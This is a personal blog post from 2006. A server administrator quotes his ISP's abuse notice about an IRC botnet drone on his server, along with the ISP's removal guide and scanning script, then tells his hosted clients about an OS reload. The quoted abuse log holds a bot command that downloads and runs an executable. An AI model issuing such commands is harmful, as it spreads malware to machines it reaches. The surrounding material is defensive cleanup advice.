
Root (wute) Kit

Yea, so I received this e-mail from my ISP:

Subject: Policy Enforcement of LTSV-## at {my IP} for IRC Malicious

NOTES: Remove the IRCd software from this server. It is being used for malicious intent.
QUOTE FROM THE
Axxx has changed the topic on channel #lucky to “.dl http://(url)/a.goud5/install.exe a.exe 1 -s”
.l ………. -s
.q

NOTES: I have added an Exploit Removal Guide below my signature block. This will help search for common exploits.

Dear Client,

This is a Policy Enforcement Notice that your server has violated our Acceptable Use Policy available at http://www.layeredtech.com/aup.shtml. Please refer to the attached complaints and/or logs of abuse. If you believe we have traced this issue to you erroneously, our staff will investigate the issue further.

IT IS YOUR RESPONSIBILITY TO REMOVE ALL DOMAINS, USERS, AND CONTENT CAUSING THIS ABUSE ISSUE AND TO INVESTIGATE ANY MISCONFIGURED, INFECTED, OR UNAUTHORIZED USE OF SOFTWARE.

PENDING YOUR REQUIRED REPLY WITH YOUR COMMENTS, QUESTIONS, OR ACTIONS TO RESOLVE THIS ISSUE, THE SERVER IS:

[] Monitored for Additional Violations
[] Accessed for Investigation, Cleaning, Hardening, or Securing
[x] Disconnected in: [] 24-Hours [x] 12-Hours [] 6-Hours [] 1-Hour [] 0-Hours
[] Required Reload Request with: [] New Client Required [] No Data Recovery [] Data Recovery Allowed
at http://support.layeredtech.com under “Open a Ticket”
[] Hard Drives Seized for Investigation
[] Null-Routed
[] Port Shutdown
[] On 30-Day Probation
[] Reviewed for Possible Cancellation
[] Cancelled

FOR THE FOLLOWING REASONS:

[] Child Porn C Hosting, Distributing, or Linking to Pornography Involving a Person Under Legal Age
[] Copyright L Hosting, Distributing, or Linking to Copyright Infringed Materials
[] Cracking H Brute Force Access of Secured Network Devices
[] DoS H Denial of Service Attack of Network Devices
[] Forgery M Faking an IP Address, Hostname, E-Mail Address, or Header
[] Fraud Site H Hosting or Linking to a Website Intended to Deceive the Public
[] Hacking H Circumventing Security Systems of Network Devices
[] HYIP Site M Hosting or Linking to a Website of High Yield Investment Program, Ponzi Scheme, or Pyramid Scheme
[] ID Theft H Hosting, Distributing, or Linking to Stolen Account Identification Information
[] Infection H Hosting, Distributing, or Linking to Exploits, Trojans, Viruses, or Worms
[x] IRC Malicious M Malicious Use of Internet Relay Chat
[] IRC Unregistered L Internet Relay Chat Server not Registered with Layered Technologies
[] Phishing H Identity Theft by Email Under False Pretense
[] ROKSO Spamhaus C ROKSO Blacklisting of an IP at www.spamhaus.org for Malicious Activity
[] Scanning H Probing for Vulnerabilities of Network Devices
[] Shells H Hosting Accounts Primarily for Shell Access
[] Spam Cannon E Sending High Volume Spam (UCE or UBE)
[] Spam Email L Unsolicited Commercial Email (UCE) or Unsolicited Bulk Email (UBE)
[] Spam List M Hosting, Distributing, or Linking to Email Address Lists for Spam
[] Spam Proxy C Hosting an Open Proxy Server Used for Spam
[] Spam Relay C Hosting an Open Mail Relay Used for Spam
[] Spam Hijack C Distributing Spam Through a Third Party Server Vulnerability
[] Spam Site L A Site Advertised by Spam Email or Spam Web
[] Spam Ware H Hosting, Distributing, or Linking to Software Designed for Spamming
[] Spam Web L Unsolicited, Bulk, or Forged Site Advertisement in Web Logs, Forums, or Guestbooks
[] Terrorist Site C Hosting or Linking to a Site Advocating Terrorism
[] Toolz L Hosting, Distributing, or Linking to Cracking, DoS, Forgery, Infection, or Scanning Software or Instruction
[] Trademark L Hosting, Distributing, or Linking to Trade Mark Infringed Materials
[] Warez L Hosting, Distributing, or Linking to Crackz, Hackz, KeyGenz, Serialz, or Pirated Software

[] OTHER:

Thank you for your cooperation,

Layered Technologies Abuse Team

On Thu, 02 Mar 2006 13:01:42 -0600, pen@ev6.net wrote:

>> hello,
>>
>> recently stumbled onto a drone ircd on your network, {my IP}:8080,
>> channel #lucky.
>>
>> i was going to contact the customer directly but their whois info
>> provides no abuse contact or any other usable contact.
>>
>> please null route this ip immediately. the bots on this server are being
>> used to DDoS a customer of ours..
>>
>>
>> thanks,
>> jl, ev6 networks.

Thank you,

Tom
Layered Technologies
Policy Enforcement Technician

ACCEPTABLE USE POLICY at http://layeredtech.com/aup.shtml

### Exploit Removal Guide ###

The following is a first step in finding and removing exploits and root kits on a Linux or BSD system.

1. EXECUTE THE FOLLOWING COMMANDS TO HELP PREVENT UPLOADS OF EXPLOITS:

chmod 0750 `which curl` 2>&-; chmod 0750 `which fetch` 2>&-; chmod 0750 `which wget` 2>&-

2. EXECUTE THE FOLLOWING COMMANDS TO CHECK FOR POSSIBLE EXISTING EXPLOITS:

sh
: > exploits.txt; for x in /dev/shm /tmp /usr/local/apache/proxy /var/spool /var/tmp; do ls -loAFR $x 2>&- | grep -E "^$|^/| apache | nobody | unknown | www | web " | grep -E "^$|^/|/$|\*$|\.pl$" | tee -a exploits.txt; done; echo -e "\n\nPossible Exploit Files and Directories: $(grep -Ev "^$|^/" exploits.txt | wc -l | tr -d ' ')" | tee -a exploits.txt
exit

Lines ending with an asterisk ‘*’, ‘.pl’, or a slash ‘/’ are possible exploit files or directories which should be investigated and removed followed by rebooting the server to kill any running exploit processes. You can refer to the exploits.txt file generated by the above commands for later reference.
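To see what step 2 actually selects, here is the same two-stage grep filter wrapped in functions and run over a constructed sample tree. This is an added example, not the ISP's script and not code from this blog. It assumes an owner pattern passed as a parameter (the guide hard-codes apache, nobody, unknown, www and web; the sample files here are owned by whoever runs the script), writes the listing to stdout instead of exploits.txt, and sends ls errors to /dev/null rather than closing stderr with 2>&-. The sample tree is built in a temp directory and contains no real malware, only empty files with suggestive names and modes.

```shell
#!/bin/sh
# Added example, not the ISP's script: the "possible exploit files" check from
# the removal guide, wrapped in functions and run over a constructed tree.
# The owner pattern is a parameter (assumption of this example) because the
# demo files are owned by the current user, not by apache/nobody/www.

# suspect_listing DIR OWNER_REGEX
# Recursive long listing of DIR (ls -F marks executables with '*' and
# directories with '/'). The first grep keeps blank lines and directory
# headers (for readability) plus entries whose owner matches OWNER_REGEX;
# the second keeps, of those, only directories, executables and .pl files.
suspect_listing() {
    ls -loAFR "$1" 2>/dev/null \
        | grep -E "^\$|^/| ($2) " \
        | grep -E "^\$|^/|/\$|\*\$|\.pl\$"
}

# suspect_count DIR OWNER_REGEX
# Number of flagged entries, excluding the headers and blank lines that
# suspect_listing keeps for readability (same count the guide prints).
suspect_count() {
    suspect_listing "$1" "$2" | grep -Ev "^\$|^/" | wc -l | tr -d ' '
}

# make_demo_tree
# Builds a constructed sample tree and prints its path: an executable
# "dropper", a Perl script, a directory holding another executable, and a
# plain text file that should not be flagged. All files are empty.
make_demo_tree() {
    d=$(mktemp -d)
    : > "$d/a.exe";       chmod 755 "$d/a.exe"
    : > "$d/dropper.pl";  chmod 644 "$d/dropper.pl"
    : > "$d/normal.txt";  chmod 644 "$d/normal.txt"
    mkdir "$d/hidden"
    : > "$d/hidden/x.sh"; chmod 755 "$d/hidden/x.sh"
    printf '%s\n' "$d"
}

# Demo run: list and count the flagged entries, then remove the sample tree.
demo=$(make_demo_tree)
me=$(id -un)
suspect_listing "$demo" "$me"
printf '\nPossible Exploit Files and Directories: %s\n' "$(suspect_count "$demo" "$me")"
rm -rf "$demo"
```

On the sample tree the listing shows a.exe*, dropper.pl, hidden/ and hidden/x.sh* and the count is 4; normal.txt is dropped by the second grep, and passing an owner pattern that matches nobody on the box yields an empty listing and a count of 0. The owner filter is the weak point of the guide's heuristic: a dropper that runs as a user outside the hard-coded list is never listed, which is why the guide follows up with rkhunter rather than stopping here.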

3. You should also install and run the program called rkhunter.

Rootkit Hunter is a scanning tool to ensure, with about 99.9% certainty, that you’re clean of nasty tools.

This tool scans for rootkits, backdoors and local exploits by running tests like:

– MD5/SHA1 hash compare
– Look for default files used by rootkits
– Wrong file permissions for binaries
– Look for suspected strings in LKM and KLD modules
– Look for hidden files
– Optional scan within plaintext and binary files

WWW: http://www.rootkit.nl/

On BSD systems:
cd /usr/ports/security/rkhunter; make install clean; rehash; rkhunter -c
(or for help with rkhunter arguments do: rkhunter -h)

On RedHat, Fedora, CentOS systems:
yum -y install rkhunter; rkhunter -c
(or for help with rkhunter arguments do: rkhunter -h)

If you cannot do this, our staff will clean, harden, and secure the server for you for a fee, or you can have a 3rd party company do it.

If you cannot secure your server, you should issue a Reload Request of your system at http://support.layeredtech.com under “Open A Ticket”.

And the Rootkit Hunter didn’t find any rootkits… unfortunately. So, it’s time to do a system refresh. I sent this e-mail to the owners of the domains that I host:

Dear “clients”:

The server, nooblet.us, which hosts your domain(s), files or e-mails, nicely acquired a rootkit today (http://en.wikipedia.org/wiki/Rootkit). I was unable to find out what caused it, or even where it resides, so my ISP strongly recommends I do an OS reload (very soon). I will begin the OS reload on Friday, March 2nd, 2006 (tomorrow), at approximately 2 p.m. PST.

I have installed lots of software on this server, so it might take me a while to get it all caught up and reinstalled. Hopefully I can get it completed within 1 day. During this time, your mail, files, and everything else associated with your domains will not be available.
Also, it has come to my attention that too many of you have ssh access. This is essentially what caused the problem. Unless you make a deal with me to pay for some of the cost of the server, ssh access will be limited to me alone; you will instead only have ftp access to write files to the server. If you need ssh access, send me a message after I restore the server and we can negotiate a price.

The information that *will not* be lost during the server move includes:
1. Files. I have backed up all of the files for your domain and will restore them as soon as I can. My home system has a 30KB/s upload limit, so it might take a while.
2. Domain Configuration. I have backed up the “named” files, so restoring this information should be the first to be done.

The information that *will* be lost during the server move includes:
1. E-mail accounts. This includes both the e-mails themselves and the login/password information. If you want to backup your e-mails, I’d suggest you do that as soon as possible, because it WILL be gone on Friday.
2. Username/password pair combinations. Your login will be lost. I will provide you with your username and a dummy password when the server is restored.

My e-mail {} will be down during the transition, so you can e-mail RnospamDEHLER(at)gmail.com in the meantime with questions or comments.

Sorry for the inconvenience, but really I’m just as inconvenienced as you, if not more.

Please send me your non-nooblet.us hosted e-mail to RnospamDEHLER(at)gmail.com and I can provide you with updates as they come.

Bummer, eh?


Vigenere Cipher

I completed a Vigenere Cipher in C++, as guided from this site.

My code for the vigenere cipher.
